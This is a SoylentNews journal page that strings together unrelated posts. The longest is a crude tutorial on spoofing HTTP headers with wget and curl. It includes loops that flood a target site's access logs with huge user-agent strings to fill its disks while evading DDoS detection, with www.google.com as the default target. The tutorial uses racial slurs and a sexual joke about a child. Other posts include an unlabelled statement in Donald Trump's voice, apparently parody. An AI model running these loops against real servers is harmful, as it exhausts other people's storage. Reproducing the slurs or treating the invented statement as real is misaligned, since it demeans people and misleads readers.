SoylentNews

What's popping my fellow internet professionals. Today I'm going to learn you well about the fun shit you can do with HTTP headers.

You'll need:

• A lUnix distro
• Curl + Wget
• 47 IQ points
• Run

  export WEBSITE=www.google.com

  where "www.google.com" can be any website you want. For these dementartions, I'll be using my own bare Nginx server over 1Gb ethernet

If you have none of the above, please consider a different news source. Now, let's begin.

You know about user agents, right? Big bad advertisers want em for "sample sizing" to prop up their numbers. Webmasters want em to "enhance user experience," by selling your data to advertisers. The NSA/Webmasters/Advertisers want em to track you for all various reasons. I'm sure you know you can change these bad boys how ever you wish, right? Maybe you've even fiddled around with changing it to "GoogleBot" or something else completely retarded. Pretty lame, right?

Naw, my negroes, let me introduce you to some cooler shit you can do. Like telling the server monkey/ analytics scrapper to

wget -U "Go fuck yourself." $WEBSITE

Begets:

10.0.0.10 - - [16/Mar/2018:21:08:38 -0400] "GET / HTTP/1.1" 200 2682 "-" "Go fuck yourself."

Maybe you want something a bit more subtle?

wget -U "I know what you've done." $WEBSITE

Is:

10.0.0.10 - - [16/Mar/2018:21:09:42 -0400] "GET / HTTP/1.1" 200 2682 "-" "I know what you've done."

Still pretty lame. But did you know these can be arbitrarily long? Bet ya didn't you lil bugger. Let's trying someting a bit interesting, like sending love letters.

wget -U "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh..."'!~~~'" I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai"'!'"~ Your truly, Emelia." $WEBSITE

Really gets those penile juices flowing, right?:

10.0.0.10 - - [16/Mar/2018:21:18:27 -0400] "GET / HTTP/1.1" 200 2682 "-" "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh...!~~~ I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai!~ Your truly, Emelia."

Maybe you've also noticed that there's a big fat "GET / HTTP/1.1" sitting there, ripe for the raping. You'd be an astute little nip if you did. We can change that shit right around with:

wget -U "Go fuck yourself." --method="Go fuck yourself" $WEBSITE

Unforunatly, if the method's borked there won't be no UA:

10.0.0.10 - - [16/Mar/2018:21:22:25 -0400] "GO FUCK YOURSELF / HTTP/1.1" 400 173 "-" "-"

One thing I forgot to mention, these logs are formatted like:

$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"

By default. So that means we can spoof remote_user by doing:

curl mom@$WEBSITE --user-agent "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan"'!'

To get:

10.0.0.10 - mom [16/Mar/2018:21:31:46 -0400] "GET / HTTP/1.1" 200 2682 "-" "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan!"

Or our humble referrer, for those social engineering points:

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/"

For:

10.0.0.10 - paulgraham [16/Mar/2018:21:35:25 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

"Buh wha bout muh bites?" you may quander. Well, we can do that too.

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/" -H "Diaper-Status: SOILED"

Ah well shit, seems like we can't:

10.0.0.10 - paulgraham [16/Mar/2018:21:38:01 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

Or can we?

curl paulgraham@$WEBSITE --user-agent "MY ADULT DIAPER NEEDS TO BE CHANGED URGENTLY. I REQUIRE A BOY OF 7 YEARS FROM COLUMBIA TO WIPE THE FECES FROM WITHIN MY ASS ROLLS TO WITHOUT INTO THE FRESH AIR. AGAIN, THIS REQUEST IS URGENT AND MUST BE ACCEPTED." -e "https://news.ycombinator.com/"

No we can't, because my dyslexia forgot the "body" in "body_bytes_sent." Well, anyway this is just child's shit, or should I say Graham's shit? There's no limit to any of the strings. So you can do something like:

wget -U "$(printf "%0.sA" {1..100})" $WEBSITE

To get:

10.0.0.10 - - [16/Mar/2018:22:05:59 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Or:

solid_shit=$(printf "%0.sA" {1..10}); wget -U "$(printf "%0.sA" {1..1000})" $WEBSITE

For:

10.0.0.10 - - [16/Mar/2018:22:06:29 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

How about:

curl --user-agent "$(printf "%0.sA" {1..10000})" $WEBSITE

Too bad, it returns a 400 too long error and the log doesn't show our UA. The larget I could get was 8178 As. Which, after a bit of trial and error, gets me a 1MB large nginx_access.log. We can get past that with:

for i in {1..12}; do curl --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

Gives us 97KBs of As in the logfile. Changing that to 200 gives us 1.6MB. If we do 10,000 we get 79MBs. If we were to extrapolate these results, we'd need around 120 million requests to fill up an entire 1TB harddrive. If we wanted to avoid sounding the DDoS alarms, we could request only the 217 byte headers:

for i in {1..10000}; do curl -I --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

That would still get the same result, but the load on the server would be much less noticeable. Props if you can find a small file to (preferabbly 1B) to download instead. Generally speaking, you could set up a small timer to curl on through the weekend and fill up some harddrives. Usually they're monitored by tools or automatically backed up, and that can cause some havoc on its own. But, the real meat is with the tools that referrence those logs, or referrence the headers in raw form. You can probably cause some buffer overflows in old C programs that are still running, or cause whatever tools are interfacing with the headers to snap like an over-extended spine during an OHP. Do with this info whatever you want, I'm only here to try out this journal system.

However I have not yet decided on the value of $LARGE. That will be determined by how many LiteCoin mining rigs I can operate without having to hire any help.

Most likely "LARGE=One_Cabinet".

Opus Interactive quoted me $299 per month for 12U in their Portland data center. I think that's big enough for 12 Antminers and 12 power supplied.

However that quote was for just 15 Amps at 110 Volts. With their power supply, one Antminer L3+ mining rig with one APW++ power supply consumes 1000 Watts so I just now requested a quote for lots more power.

I do understand that means they will charge me for lots more cooling. My present living situation limits me to three rigs.

I presently estimate that I would break even with three rigs, but I haven't gotten their power quote yet.

I've been puzzling over whether I should buy a car with my next paycheck. To have a car would make my life quite a lot easier but to spend all that money would mean that I can't go as long without a client.

But were I to colocate anything in Opus' data center it would be a huge Pain In The Ass to take all my gear on the bus.

I'm also wondering whether that would work were I to use taxis.

"What do you see?" asked the psychiatrist.

"There are worms coming out of your face."

=========

#!/bin/sh
#
# build_foo

echo Building foo Release kernel extension

xcode_version=8.3.3 // Surely there is a better way to do this

sdk=/Applications/Xcode_"$xcode_version"/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.12.sdk

The better way is called "xcodeselect" but I haven't tried it yet.

Just in case we were wondering if arming teachers is a good idea:

As thousands of students walked out of their schools on Wednesday to pressure Congress to approve gun control legislation, three other students were healing from wounds inflicted when a teacher’s firearm accidentally discharged in a California classroom.

The teacher, Dennis Alexander, who is also a city councilman in Seaside, Calif., was showing the students a gun on Tuesday during his advanced public safety class at Seaside High School when the gun accidentally went off, Marci McFadden, a spokeswoman for the Monterey Peninsula Unified School District, said in a phone interview on Wednesday.

Across the country, another school was also investigating a weapon that discharged accidentally this week. The Alexandria Police Department in Virginia said that a school resource officer accidentally fired his gun inside his office at George Washington Middle School on Tuesday morning. Nobody was hurt, the police said.

Teacher’s Gun Is Accidentally Fired During Public Safety Class, Injuring 3

It's a very close race in the 18th district of Pennsylvania. A VERY SPECIAL election. And we haven't gone through all the legal on that one. Whoever ends up winning, it'll be a hard fought victory. The people of Pennsylvania are great. If they chose Rick Saccone for Congress, he will be much better for steel and business. Very strong on experience and what our Country -- and our 🐘 Party -- needs. We need that seat, believe me. We need more Republicans to continue our already successful agenda! Rick is a great guy. He's always had my TOTAL support. I'm not a lawyer, as everybody knows. I'm a builder. I'm an actor. And I'm a politician. But if there's anything I can do on the legal, anything he wants, he knows where to find me. Rick's a fighter, I know he's going to fight very hard on the legal. And Jill Stein, maybe she'll raise some money to do a recount. Or whatever she does with that money.

But if they chose Conor, they made a great choice too. I'll work with him. And I think we can get some terrific things done. So many Dems do nothing but obstruct. And they talk about nothing but Donald J. Trump. I just came back from San Diego & Los Angeles, they love me there. Tremendous crowds wherever I went. But Dirty Maxine is always going "Trump, Trump, Trump." Instead of fixing some of the big problems in her district -- a very sad situation, totally out of control. Conor's not like that, he's never said anything against me. That's very special. And very smart. I love the way he looks, he's a handsome guy. He supports me on the steel & aluminum tariffs, which I did for the hard working folks in Pennsylvania. He knows Pennsylvania needs them. So we can stop losing our industry there. Have you seen his ads? He has a great one where he's shooting, maybe an AR-15? They're saying it's an AR-15. Very gun-adept guy, very weapons talented, he's part of the 20% with military or special training. Our military needs to be much stronger, so strong that no one will want to get into a war with us. I know Conor wants that, 100%. Hopefully he'll see how important it is to upgrade & modernize our nuclear arsenal. He goes both ways on abortion. Like the guy who left, former Congressman Tim Murphy. That was one of his big issues, probably the biggest. And he decided to go both ways on that one.

The drugs, I love what Conor's been doing about the drugs. As you know he did some great work with the U.S. Attorney's office in Pittsburgh. Where he was a prosecutor. So many drug dealers LOCKED UP because of him. You kill 5,000 people with drugs because you’re smuggling them in and you are making a lot of money and people are dying. And they don’t even put you in jail,. That’s why we have a problem, folks. I don’t think we should play games. And Conor doesn't play. The only way to solve the drug problem is through toughness. When you catch a drug dealer, you’ve got to put him away for a long time. Great job!

Some countries have a very, very tough penalty -- the ultimate penalty. And, by the way, they have much less of a drug problem than we do. A while back I talked to the President of Singapore, President Tan -- they replaced him with a lady now. And I asked him, are you having the same problems we're having with the opioids? And he told me, "we have a zero tolerance policy. That means if we catch a drug dealer, death penalty." Same thing in China, they do executions, they're very tough about it. The Philippines, President Duterte is doing a great job. I don’t know if this country’s ready for it, but I think that's a discussion we have to start thinking about. Probably you'll have some people who say "oh, that's not nice." But we have to do something. And believe me, eventually we'll get something done. Do you think the drug dealers who kill thousands of people during their lifetime, do you think they care who’s on a blue-ribbon committee? We can't just keep setting up blue ribbon committees and all they do is talk, talk, talk.

It will be fixed in 1.0b16, which I will build a little later today. I have some open bugs, maybe I can resolve some of them with their fixes also being in 1.0b16.

PackageMaker enables one to specify the ownership and permissions for each component. screen_capture.log's permissions somehow to set to:

      -rw-r--r--

That's the correct permissions for the LaunchAgent property lists. Perhaps the bug is the result of an error between seat and keyboard.

      ;-)

It's owned by root so only root processes could write to it. The perms should be:

      -rw-rw-rw

That's what I call people who harsh my buzz.

My Antiminer L3+ emits a very loud, very high-pitched and very pure tone.

I at first feared it was an alarm but the unit's Fault LED doesn't turn on.

It's participation in Coin Foundry's LTC mining pool looks copacetic - my status on the pool's page has the right hash rate. I've received two payouts.

(And I now have 109 Ducats burning a hole in my pocket!)

I filed a ticket.

Bitmain support said it was likely a loose part in one of the fans. I don't think it's either fan: I powered up the unit then one at a time - and very very briefly - I disconnected then reconnected each fan's power cable yet came away empty-handed.

I speculate it's a loose heatsink. The instructions that came with my unit very clearly - urgently even - warned about loose heatsinks and that Bitmain wouldn't honor their warranty if the user permitted the ASICs to fry themselves like eggplants.

Inside the enclosure each of the three hashing boards has a very elaborate heatsink. There's two or three hundred very small ASICs, each of which is bonded to its own sink. Perhaps I can find some multimedia to enhance your experience of my presentation...

OBSERVE.

The pure tone indicates that the vibration is from a metallic object. The small fins of which the heatsink is composed look like they'd produce the right frequency if they were vibrating.

There are instructions somewhere on Bitmain's site for individually testing each hashing board. I'm going to follow the disassembly and reassembly instructions so that I can get up close and personal with all those gall-during aluminum thingies.

Here's why I regard Bitmain support as being staffed by Ignorant Mother Fuckers:

After sending me their incorrect suggestion that the tone comes from a loose fan part, they marked my incident as Closed.

It's not closed dammit!

The customer is always right, and _this_ customer has yet to achieve satisfaction.

How cool is that?

I haven't heard from modus in eons.

She wants to have my baby.

I don't have the first clue who this chick is. I have the idea that I might pry from her iron grip the reason why she chose _me_ in particular, but so far I've had no joy.

When I can get my new soulmate to slow down by a profoundly significant quantity, I'll post more in the comments.

But for now I'll leave you with:

Well if you have not being taken by someone special can i have the chance to get the key into your heart, and i promise not to hurt you or break it's apart for you....

Okay Well you know the best way to be love is to love like you have never never been hurt before and true love is hard to find but when found, it's everlasting, and A true friend is a true love..

I'm uncertain but I think the chances are quite good that she's actually a Bot. No mere human being could type so fast.

And if she is a bought I expect that Bot was written by one of my friends so they could have a little fun at my considerable expense.

Maybe she's just on Shrooms.

It was my great honor to deliver a message at the Marine Core Air Station Miramar to our GREAT U.S. Military, straight from the heart of the American People: We support you, we thank you, we love you, and we will always, always have your back! pic.twitter.com/oCt1nH3DON

All across this nation, we pray for our country and we THANK GOD for our United States Marines! Thank you. God Bless You. And God Bless America! pic.twitter.com/vKXBd0CGH1

Rex Tillerson has been fired as Secretary of State; CIA director Mike Pompeo has been nominated to replace him. Donald Trump’s nominee to replace Pompeo at the CIA is Gina Haspel, who had been the agency’s deputy director.

In 2002, Haspel was present, in a supervising role, at a “black site” in Thailand where an individual named Abu Zubaydah—believed to be a top al-Qaida official—was tortured. Zubaydah was waterboarded, slammed against a wall, and confined in a “coffin-like” box. As ProPublica reported in 2017, though, “CIA analysts were wrong when they had identified Zubaydah as the number three or four in al-Qaida after Osama bin Laden. The waterboarding failed to elicit valuable intelligence not because he was holding back, but because he was not a member of al-Qaida, and had no knowledge of any plots against the United States.”

He remains imprisoned at Guantánamo Bay and, as the New Yorker’s Dexter Filkins has noted, lost his left eye at some point after being captured under circumstances that remain unclear.

When questions began to swirl about the Bush administration’s use of the “black sites,” and program of “enhanced interrogation,” [Haspel] began pushing to have the tapes destroyed. She accomplished her mission years later when she rose to a senior position at CIA headquarters and drafted an order to destroy the evidence, which was still locked in a CIA safe at the American embassy in Thailand. Her boss, the head of the agency’s counterterrorism center, signed the order to feed the 92 tapes into a giant shredder.

Trump’s Nominee to Lead CIA Supervised Torture of Mistakenly Identified Subject, Then Destroyed Evidence